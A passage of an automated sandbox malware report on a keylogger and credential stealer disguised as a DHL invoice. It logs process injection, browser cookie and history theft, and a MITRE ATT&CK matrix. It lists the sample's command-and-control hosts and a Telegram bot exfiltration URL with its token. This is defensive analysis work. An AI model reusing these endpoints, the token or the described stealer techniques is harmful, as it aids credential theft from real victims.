                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FBF008Jump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00391201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00391201
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00372BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00372BA5
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039B226 SendInput,keybd_event,0_2_0039B226
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_003B22DA
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00390B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00390B62
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00391663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00391663
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00350698 cpuid 0_2_00350698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_003A8195
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0038D27A GetUserNameW,0_2_0038D27A
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0036B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0036B952
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003342DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_81
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_XP
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_XPe
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_VISTA
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_7
                  Source: DHL DOC INV 191224.gz.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_003B1204
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003B1806

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts                  		1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		4
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts                  		31
                  Obfuscated Files or Information                  		Security Account Manager1
                  File and Directory Discovery                  		SMB/Windows Admin Shares21
                  Input Capture                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS126
                  System Information Discovery                  		Distributed Component Object Model3
                  Clipboard Data                  		4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		2
                  Valid Accounts                  		LSA Secrets221
                  Security Software Discovery                  		SSHKeylogging15
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials111
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Access Token Manipulation                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  DHL DOC INV 191224.gz.exe47%VirustotalBrowse
                  DHL DOC INV 191224.gz.exe74%ReversingLabsWin32.Spyware.Snakekeylogger
                  DHL DOC INV 191224.gz.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.97.3
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		193.122.130.0
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360475312&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                              		high
                              http://checkip.dyndns.org/false
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2004/01/2025%20/%2001:55:27%0D%0ACountry%20Name:%20%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/RegSvcs.exe, 00000002.00000002.4475356588.0000000003289000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/botRegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://chrome.google.com/webstore?hl=enlBsqRegSvcs.exe, 00000002.00000002.4475356588.0000000003253000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.4475356588.0000000003258000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://varders.kozow.com:8081DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://aborters.duckdns.org:8081DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://chrome.google.com/webstore?hl=en(RegSvcs.exe, 00000002.00000002.4475356588.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://anotherarmy.dns.army:8081DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://checkip.dyndns.org/qDHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.office.com/lBsqRegSvcs.exe, 00000002.00000002.4475356588.0000000003284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000002.00000002.4475356588.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003118000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4475356588.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.000000000315E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.office.com/(RegSvcs.exe, 00000002.00000002.4475356588.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://api.telegram.orgRegSvcs.exe, 00000002.00000002.4475356588.00000000031D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedDHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://reallyfreegeoip.org/xml/DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  149.154.167.220
                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                  		62041TELEGRAMRUfalse
                                                                                                  188.114.97.3
                                                                                                  		reallyfreegeoip.orgEuropean Union
                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                  193.122.130.0
                                                                                                  		checkip.dyndns.comUnited States
                                                                                                  		31898ORACLE-BMC-31898USfalse

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1583321
                                                                                                  Start date and time:2025-01-02 13:44:09 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 7m 40s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:5
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
